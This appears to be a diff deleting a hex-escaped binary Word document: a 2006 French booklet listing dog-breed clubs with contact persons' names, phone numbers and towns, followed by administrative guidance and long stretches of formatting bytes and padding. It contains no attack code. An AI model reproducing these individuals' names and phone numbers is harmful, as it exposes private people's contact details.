-"\x07\x30\x34\x2e\x37\x36\x2e\x36\x38\x2e\x32\x39\x2e\x39\x35\x07"
-"\x56\x69\x7a\x69\x6c\x6c\x65\x07\x50\x56\x4c\x07\x07\x37\x37\x07"
-"\x43\x4c\x43\x42\x07\x4d\x6d\x65\x20\x50\x61\x69\x6c\x6c\x65\x74"
-"\x07\x30\x31\x2e\x36\x34\x2e\x30\x36\x2e\x36\x38\x2e\x31\x34\x07"
-"\x4c\x69\x76\x65\x72\x64\x79\x07\x45\x4e\x43\x07\x07\x33\x37\x07"
-"\x43\x4c\x53\x54\x07\x4d\x6c\x6c\x65\x20\x4d\x61\x73\x73\x61\x07"
-"\x30\x32\x2e\x34\x37\x2e\x39\x34\x2e\x37\x38\x2e\x38\x32\x07\x54"
-"\x6f\x75\x72\x73\x07\x50\x56\x4c\x07\x07\x37\x32\x07\x43\x4c\x55"
-"\x42\x07\x4d\x2e\x20\x46\x65\x75\x76\x72\x69\x65\x72\x07\x30\x32"
-"\x2e\x34\x33\x2e\x32\x30\x2e\x35\x36\x2e\x32\x36\x07\x4c\x61\x20"
-"\x43\x68\x61\x70\x65\x6c\x6c\x65\x20\x53\x74\x20\x46\x72\x61\x79"
-"\x07\x50\x56\x4c\x07\x07\x33\x31\x07\x43\x4c\x4d\x50\x07\x4d\x2e"
-"\x20\x4d\x61\x67\x72\x65\x74\x07\x30\x35\x20\x36\x33\x20\x32\x36"
-"\x20\x34\x33\x20\x30\x38\x07\x4d\x6f\x6e\x74\x61\x75\x62\x61\x6e"
-"\x07\x45\x4e\x43\x07\x07\x36\x33\x07\x43\x4c\x53\x43\x41\x42\x07"
-"\x4d\x6d\x65\x20\x4d\x69\x6e\x65\x74\x2d\x42\x61\x72\x64\x6f\x74"
-"\x07\x30\x34\x2e\x37\x30\x2e\x30\x36\x2e\x30\x39\x2e\x33\x37\x07"
-"\x54\x68\x69\x65\x72\x73\x07\x45\x4e\x43\x07\x07\x30\x33\x07\x52"
-"\x43\x4c\x59\x07\x4d\xa0\x2e\x47\x61\x77\x6c\x61\x73\x20\x52\x69"
-"\x63\x68\x61\x72\x64\x07\x07\x59\x7a\x65\x75\x72\x65\x07\x53\x74"
-"\x61\x67\x65\x2d\x65\x6e\x74\x72\x2e\x20\x45\x4e\x43\x07\x07\x36"
-"\x34\x07\x43\x50\x4c\x53\x07\x4d\x6d\x65\x20\x47\x72\x6f\x6c\x65"
-"\x74\x07\x30\x35\x2e\x35\x39\x2e\x30\x36\x2e\x32\x35\x2e\x35\x37"
-"\x07\x50\x61\x75\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e"
-"\x74\x73\x07\x07\x37\x30\x07\x4c\x43\x41\x07\x4d\x6d\x65\x2e\x20"
-"\x47\x69\x72\x61\x72\x64\x07\x30\x33\x2e\x38\x34\x2e\x37\x36\x2e"
-"\x30\x35\x2e\x39\x31\x07\x4c\x61\x66\x65\x72\x74\xe9\x20\x73\x2f"
-"\x61\x6d\x61\x6e\x63\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07"
-"\x30\x33\x07\x52\x43\x4c\x43\x07\x4d\x2e\x20\x4d\x6f\x6e\x65\x74"
-"\x07\x30\x34\x2e\x37\x30\x2e\x35\x31\x2e\x37\x30\x2e\x34\x31\xa4"
-"\x4d\x6f\x6e\x74\x6d\x61\x72\x61\x75\x6c\x74\x07\x50\x56\x4c\x07"
-"\x07\x36\x39\x07\x52\x43\x52\x07\x4d\x6d\x65\x20\x4f\x70\x69\x6e"
-"\x65\x6c\x07\x30\x34\x2e\x37\x32\x2e\x38\x38\x2e\x32\x39\x2e\x32"
-"\x36\x07\x43\x68\x61\x74\x69\x6c\x6c\x6f\x6e\x20\x4c\x61\x50\x61"
-"\x6c\x75\x64\x07\x45\x4e\x43\x07\x07\x31\x33\x07\x54\x43\x50\x4c"
-"\x43\x07\x4d\x2e\x20\x43\x72\x6f\x69\x6e\x07\x30\x34\x2e\x39\x30"
-"\x2e\x33\x38\x2e\x38\x35\x2e\x30\x30\x07\x4d\x6f\x6e\x74\x65\x75"
-"\x78\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32\x39\x07\x41\x4c"
-"\x50\x43\x07\x4d\x6d\x65\x20\x51\x75\xe9\x61\x75\x07\x30\x32\x2e"
-"\x39\x38\x2e\x37\x38\x2e\x34\x34\x2e\x31\x37\x07\x50\x6c\x65\x79"
-"\x62\x65\x72\x2d\x43\x68\x72\x69\x73\x74\x07\x45\x4e\x43\x07\x07"
-"\x35\x34\x07\x43\x43\x4c\x07\x4d\x2e\x20\x4d\x6f\x72\x69\x6e\x65"
-"\x61\x75\x20\x52\x6f\x6e\x61\x6e\x07\x30\x33\x2e\x32\x39\x2e\x33"
-"\x38\x2e\x38\x35\x2e\x33\x38\x07\x4e\x61\x6e\x63\x79\x07\x53\x74"
-"\x61\x67\x65\x20\x2d\x45\x6e\x74\x2e\x20\x50\x56\x4c\x07\x07\x38"
-"\x38\x07\x43\x4c\x56\x4d\x07\x4d\x2e\x20\x53\x65\x72\x67\x65\x20"
-"\x48\x65\x69\x6d\x6c\x69\x63\x68\x07\x30\x33\x2e\x38\x37\x2e\x36"
-"\x34\x2e\x35\x32\x2e\x32\x30\x07\x4a\x65\x61\x6e\x6d\x65\x6e\x69"
-"\x6c\x07\x50\x56\x4c\x07\x07\x37\x38\x07\x4e\x41\x4c\x4c\x07\x4d"
-"\x6d\x65\x20\x54\x75\x6d\x61\x07\x30\x31\x2e\x33\x34\x2e\x36\x32"
-"\x2e\x34\x30\x2e\x31\x33\x07\x53\x6f\x69\x73\x73\x6f\x6e\x73\x07"
-"\x45\x4e\x43\x07\x07\x31\x33\x07\x43\x41\x4c\x43\x07\x4d\x2e\x20"
-"\x42\xe9\x72\x65\x6e\x67\x65\x72\x07\x30\x34\x2e\x34\x32\x2e\x30"
-"\x33\x2e\x30\x31\x2e\x39\x31\x07\x4f\x72\x61\x69\x73\x6f\x6e\x07"
-"\x45\x4e\x43\x07\x07\x33\x36\x07\x43\x4c\x53\x33\x36\x07\x4d\x2e"
-"\x20\x54\x69\x73\x73\x65\x75\x72\x07\x30\x32\x2e\x35\x34\x2e\x32"
-"\x37\x2e\x37\x31\x2e\x33\x35\x07\x43\x68\x61\x74\x65\x61\x75\x72"
-"\x6f\x75\x78\x07\x20\x50\x56\x4c\x07\x07\x38\x36\x07\x43\x4c\x53"
-"\x4c\x07\x4d\x2e\x20\x42\x69\x6c\x6c\x61\x72\x64\x07\x30\x35\x2e"
-"\x34\x39\x2e\x35\x38\x2e\x31\x39\x2e\x38\x38\x07\x50\x6f\x69\x74"
-"\x69\x65\x72\x73\x07\x53\x74\x61\x67\x65\x20\x50\x56\x4c\x2d\x45"
-"\x4e\x43\x07\x07\x36\x36\x07\x33\x43\x4c\x07\x4d\x2e\x20\x4c\x61"
-"\x66\x6f\x6e\x74\x07\x30\x34\x2e\x36\x38\x2e\x36\x31\x2e\x30\x30"
-"\x2e\x34\x38\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x45\x6e"
-"\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73\x07\x07\x0d\x56\x6f"
-"\x75\x73\x20\x70\x6f\x75\x72\x72\x65\x7a\x20\x76\x6f\x75\x73\x20"
-"\x70\x72\x6f\x63\x75\x72\x65\x72\x20\x6c\x65\x73\x20\x61\x64\x72"
-"\x65\x73\x73\x65\x73\x20\x64\x65\x20\x63\x65\x73\x20\x63\x6c\x75"
-"\x62\x73\x20\xe0\x20\x76\x6f\x74\x72\x65\x20\x53\x6f\x63\x69\xe9"
-"\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x52\xe9\x67\x69\x6f\x6e"
-"\x61\x6c\x65\x20\x6f\x75\x20\x4c\x6f\x63\x61\x6c\x65\x2c\x20\x6f"
-"\x75\x20\xe0\x20\x6c\x61\x20\x53\x43\x43\x2c\x20\x6f\x75\x20\x61"
-"\x75\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74\x20\x64\x65"
-"\x20\x6c\x61\x20\x43\x2e\x4c\x0d\x53\x69\x20\x76\x6f\x75\x73\x20"
-"\x61\x76\x65\x7a\x20\x70\x61\x72\x66\x6f\x69\x73\x20\x64\x75\x20"
-"\x74\x65\x6d\x70\x73\x20\x64\x69\x73\x70\x6f\x6e\x69\x62\x6c\x65"
-"\x2c\x20\x70\x72\x6f\x70\x6f\x73\x65\x7a\x2d\x76\x6f\x75\x73\x20"
-"\x70\x6f\x75\x72\x20\x61\x69\x64\x65\x72\x20\xe0\x20\x65\x6e\x74"
-"\x72\x65\x74\x65\x6e\x69\x72\x20\x6c\x61\x20\x70\x69\x73\x74\x65"
-"\x2c\x20\x61\x73\x73\x75\x6d\x65\x72\x20\x61\x63\x63\x75\x65\x69"
-"\x6c\x20\x65\x74\x20\x73\x65\x63\x72\xe9\x74\x61\x72\x69\x61\x74"
-"\x2c\x20\x61\x69\x64\x65\x72\x20\x61\x75\x78\x20\x65\x6e\x74\x72"
-"\x61\xee\x6e\x65\x6d\x65\x6e\x74\x73\x20\x65\x74\x20\xe9\x70\x72"
-"\x65\x75\x76\x65\x73\x20\x6f\x66\x66\x69\x63\x69\x65\x6c\x6c\x65"
-"\x73\x2e\x20\x4c\x65\x20\x73\x70\x6f\x72\x74\x20\x6c\xe9\x76\x72"
-"\x69\x65\x72\x20\x65\x78\x69\x73\x74\x65\x20\x70\x6f\x75\x72\x20"
-"\x76\x6f\x75\x73\x20\x6d\x61\x69\x73\x20\x61\x20\x62\x65\x73\x6f"
-"\x69\x6e\x20\x64\x65\x20\x76\x6f\x75\x73\x2e\x0d\x4e\x27\x6f\x75"
-"\x62\x6c\x69\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x65\x20\x6c\x65"
-"\x73\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x53\x2e\x43\x2e\x43"
-"\x2e\x20\x6f\x6e\x74\x20\x70\x6f\x75\x72\x20\x62\x75\x74\x20\x6c"
-"\x27\x61\x6d\xe9\x6c\x69\x6f\x72\x61\x74\x69\x6f\x6e\x20\x64\x65"
-"\x73\x20\x72\x61\x63\x65\x73\x20\x64\x61\x6e\x73\x20\x75\x6e\x20"
-"\x65\x73\x70\x72\x69\x74\x20\x61\x6d\x69\x63\x61\x6c\x20\x65\x74"
-"\x20\x6e\x6f\x6e\x20\x6c\x65\x20\x73\x65\x75\x6c\x20\x70\x6c\x61"
-"\x69\x73\x69\x72\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6d\x70\xe9"
-"\x74\x69\x74\x69\x6f\x6e\x20\x6d\xea\x6d\x65\x20\x73\x27\x69\x6c"
-"\x20\x65\x73\x74\x20\x72\xe9\x65\x6c\x2e\x0d\x50\x6f\x75\x72\x20"
-"\x6f\x62\x74\x65\x6e\x69\x72\x20\x75\x6e\x20\x63\x61\x72\x6e\x65"
-"\x74\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x3a\x0d\x41"
-"\x20\x6c\x61\x20\x53\x2e\x43\x2e\x43\x2e\x20\x96\x20\x73\x65\x72"
-"\x76\x69\x63\x65\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65\x20\x74"
-"\x72\x61\x76\x61\x69\x6c\x20\x2d\x20\x20\x65\x6e\x20\x70\x72\xe9"
-"\x63\x69\x73\x61\x6e\x74\x20\x63\x61\x72\x6e\x65\x74\x20\x64\x65"
-"\x20\x63\x6f\x75\x72\x73\x65\x20\x6f\x75\x20\x64\x65\x20\x70\x6f"
-"\x75\x72\x73\x75\x69\x74\x65\x2c\x20\x61\x63\x63\x6f\x6d\x70\x61"
-"\x67\x6e\xe9\x20\x64\x75\x20\x70\x72\x69\x78\x2e\x0d\x0d\x50\x6f"
-"\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x72\xe9\x63\x6c\x61\x6d\x61"
-"\x74\x69\x6f\x6e\x20\x6f\x75\x20\x6c\x69\x74\x69\x67\x65\x20\x65"
-"\x74\x20\x73\x75\x67\x67\x65\x73\x74\x69\x6f\x6e\x20\x73\x75\x72"
-"\x20\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x3a\x0d\x41"
-"\x75\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x6f\x75\x20\x73"
-"\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x64\x65\x20\x6c\x61\x20"
-"\x43\x2e\x4c\x2e\x2c\x20\x64\x69\x72\x65\x63\x74\x65\x6d\x65\x6e"
-"\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61\x20\x53\x2e\x43\x2e"
-"\x43\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x65\x20\x68"
-"\x6f\x6d\x6f\x6c\x6f\x67\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x74"
-"\x69\x74\x72\x65\x20\x61\x75\x20\x64\x6f\x73\x73\x69\x65\x72\x20"
-"\x3a\x0d\x41\x75\x20\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20"
-"\x64\x65\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20\x64\x69\x72\x65\x63"
-"\x74\x65\x6d\x65\x6e\x74\x20\x6f\x75\x20\x76\x69\x61\x20\x6c\x61"
-"\x20\x53\x2e\x43\x2e\x43\x2e\x20\x61\x70\x72\xe8\x73\x20\x61\x76"
-"\x6f\x69\x72\x20\x76\xe9\x72\x69\x66\x69\xe9\x20\x6c\x65\x73\x20"
-"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x61\x75\x70\x72\xe8"
-"\x73\x20\x64\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6c\x75\x62\x2e"
-"\x20\x53\x65\x75\x6c\x73\x20\x6c\x65\x73\x20\x64\x6f\x73\x73\x69"
-"\x65\x72\x73\x20\x63\x65\x72\x74\x69\x66\x69\xe9\x73\x20\x63\x6f"
-"\x6e\x66\x6f\x72\x6d\x65\x73\x20\x70\x61\x72\x20\x6c\x65\x73\x20"
-"\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x73\x20\x64\x65\x73"
-"\x20\x43\x6c\x75\x62\x73\x20\x73\x65\x72\x6f\x6e\x74\x20\x61\x63"
-"\x63\x65\x70\x74\xe9\x73\x2e\x0d\x0d\x50\x6f\x75\x72\x20\x74\x6f"
-"\x75\x74\x65\x20\x71\x75\x65\x73\x74\x69\x6f\x6e\x20\x72\x65\x6c"
-"\x61\x74\x69\x76\x65\x20\xe0\x20\x6c\x61\x20\x63\x6f\x6e\x66\x69"
-"\x72\x6d\x61\x74\x69\x6f\x6e\x20\x3a\x0d\x41\x75\x20\x50\x72\xe9"
-"\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20\x64"
-"\x65\x20\x72\x61\x63\x65\x20\x63\x6f\x6e\x63\x65\x72\x6e\xe9\x2e"
-"\x0d\x4c\x69\x76\x72\x65\x74\x20\xe9\x74\x61\x62\x6c\x69\x20\x70"
-"\x61\x72\x20\x6c\x65\x20\x50\x72\x6f\x66\x65\x73\x73\x65\x75\x72"
-"\x20\x47\x75\x79\x20\x51\x55\x45\x49\x4e\x4e\x45\x43\x2e\x0d\x4d"
-"\x69\x73\x65\x20\xe0\x20\x6a\x6f\x75\x72\x20\x32\x30\x30\x36\x0d"
-"\x50\x61\x67\x65\x20\x13\x20\x50\x41\x47\x45\x20\x14\x39\x15\x20"
-"\x73\x75\x72\x20\x39\x0d\x50\x2e\x4d\x2f\x20\x4c\x2e\x50\x20\x96"
-"\x20\x31\x35\x2f\x30\x32\x0d\x0d\x0d\x0d\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x06\x00\x00\x2d\x08\x00\x00\x6d\x08\x00\x00\x6e\x08\x00\x00"
-"\x80\x08\x00\x00\x43\x09\x00\x00\x51\x09\x00\x00\x79\x09\x00\x00"
-"\x81\x09\x00\x00\xf5\x0a\x00\x00\x10\x0b\x00\x00\x33\x0b\x00\x00"
-"\x66\x0b\x00\x00\x63\x0d\x00\x00\x8a\x0d\x00\x00\xbd\x0e\x00\x00"
-"\xf6\x0e\x00\x00\x98\x10\x00\x00\xb4\x10\x00\x00\x3a\x12\x00\x00"
-"\x45\x12\x00\x00\x7f\x1b\x00\x00\x90\x1b\x00\x00\x11\x1c\x00\x00"
-"\x15\x1c\x00\x00\x5e\x1d\x00\x00\x68\x1d\x00\x00\x6a\x1d\x00\x00"
-"\x5f\x20\x00\x00\x61\x20\x00\x00\xa1\x20\x00\x00\xb3\x20\x00\x00"
-"\x71\x23\x00\x00\x8d\x23\x00\x00\x3b\x26\x00\x00\x3d\x26\x00\x00"
-"\x6a\x2b\x00\x00\x87\x2b\x00\x00\x88\x2b\x00\x00\x9b\x2b\x00\x00"
-"\x42\x2c\x00\x00\x59\x2c\x00\x00\xdb\x3b\x00\x00\xe6\x3b\x00\x00"
-"\x77\x3c\x00\x00\x85\x3c\x00\x00\x0a\x40\x00\x00\x18\x40\x00\x00"
-"\x19\x40\x00\x00\x6c\x41\x00\x00\x74\x41\x00\x00\x75\x41\x00\x00"
-"\x80\x41\x00\x00\x81\x41\x00\x00\xe6\x41\x00\x00\xf0\x41\x00\x00"
-"\x4b\x42\x00\x00\x67\x42\x00\x00\xa1\x42\x00\x00\xac\x42\x00\x00"
-"\x52\x43\x00\x00\x76\x43\x00\x00\xe3\x43\x00\x00\xf6\x43\x00\x00"
-"\xc8\x44\x00\x00\xe0\x44\x00\x00\x67\x45\x00\x00\x76\x45\x00\x00"
-"\x9b\x47\x00\x00\xa4\x47\x00\x00\xf8\xf1\xea\xe1\xdd\xd8\xdd\xd8"
-"\xdd\xe1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xe1\xdd\xc8\xdd\xe1\xdd\xd1"
-"\xdd\xd1\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xc3\xdd\xe1\xdd"
-"\xe1\xdd\xe1\xdd\xe1\xdd\xe1\xbc\xdd\xe1\xb5\xd1\xaf\xdd\xd1\xdd"
-"\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\xdd\xd1\x00\x0a\x16"
-"\x68\x45\x6d\x47\x00\x43\x4a\x18\x00\x00\x0c\x16\x68\x45\x6d\x47"
-"\x00\x35\x08\x81\x3e\x2a\x01\x00\x0d\x16\x68\x45\x6d\x47\x00\x3e"
-"\x2a\x01\x43\x4a\x1c\x00\x09\x16\x68\x45\x6d\x47\x00\x35\x08\x81"
-"\x10\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x3e\x2a\x01\x43\x4a\x18"
-"\x00\x00\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a\x18\x00"
-"\x09\x16\x68\x45\x6d\x47\x00\x36\x08\x81\x06\x16\x68\x45\x6d\x47"
-"\x00\x00\x10\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x3e\x2a\x01\x43"
-"\x4a\x1c\x00\x00\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a"
-"\x20\x00\x0c\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x36\x08\x81\x00"
-"\x0d\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a\x24\x00\x00\x45"
-"\x00\x06\x00\x00\x2d\x08\x00\x00\x6e\x08\x00\x00\x81\x08\x00\x00"
-"\xab\x0a\x00\x00\xf4\x0a\x00\x00\xf5\x0a\x00\x00\x11\x0b\x00\x00"
-"\x32\x0b\x00\x00\x33\x0b\x00\x00\x66\x0b\x00\x00\x20\x0c\x00\x00"
-"\xd3\x0c\x00\x00\x08\x0d\x00\x00\x62\x0d\x00\x00\xd8\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xae\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xa4\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x9a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x9a\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x92\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x82\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x8a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x07\x00\x00\x03\x24\x03\x12\x64\x68\x01\x01"
-"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00"
-"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01"
-"\x00\x61\x24\x01\x00\x09\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00"
-"\x00\x13\xa4\x78\x00\x61\x24\x03\x00\x09\x00\x00\x03\x24\x01\x12"
-"\x64\x68\x01\x01\x00\x13\xa4\x78\x00\x61\x24\x01\x00\x29\x00\x00"
-"\x03\x24\x01\x12\x64\x68\x01\x01\x00\x24\x64\x04\x01\x00\x21\x25"
-"\x64\x04\x01\x00\x24\x26\x64\x04\x01\x00\x21\x27\x64\x04\x01\x00"
-"\x24\x4e\xc6\x08\x00\x00\x00\xff\x04\x01\x21\x00\x4f\xc6\x08\x00"
-"\x00\x00\xff\x04\x01\x24\x00\x50\xc6\x08\x00\x00\x00\xff\x04\x01"
-"\x21\x00\x51\xc6\x08\x00\x00\x00\xff\x04\x01\x24\x00\x61\x24\x01"
-"\x00\x26\x00\x00\x12\x64\x68\x01\x01\x00\x24\x64\x04\x01\x00\x21"
-"\x25\x64\x04\x01\x00\x24\x26\x64\x04\x01\x00\x21\x27\x64\x04\x01"
-"\x00\x24\x4e\xc6\x08\x00\x00\x00\xff\x04\x01\x21\x00\x4f\xc6\x08"
-"\x00\x00\x00\xff\x04\x01\x24\x00\x50\xc6\x08\x00\x00\x00\xff\x04"
-"\x01\x21\x00\x51\xc6\x08\x00\x00\x00\xff\x04\x01\x24\x00\x00\x0e"
-"\x00\x06\x00\x00\xdf\x7b\x00\x00\x19\x7c\x00\x00\xfe\xfe\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x83\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x01\x01\x02"
-"\x62\x0d\x00\x00\x63\x0d\x00\x00\x8a\x0d\x00\x00\x18\x0e\x00\x00"
-"\xbc\x0e\x00\x00\xbd\x0e\x00\x00\xf6\x0e\x00\x00\x97\x10\x00\x00"
-"\x98\x10\x00\x00\xb5\x10\x00\x00\x39\x12\x00\x00\x3a\x12\x00\x00"
-"\x46\x12\x00\x00\xbd\x12\x00\x00\xff\x12\x00\x00\xcd\x14\x00\xd8"
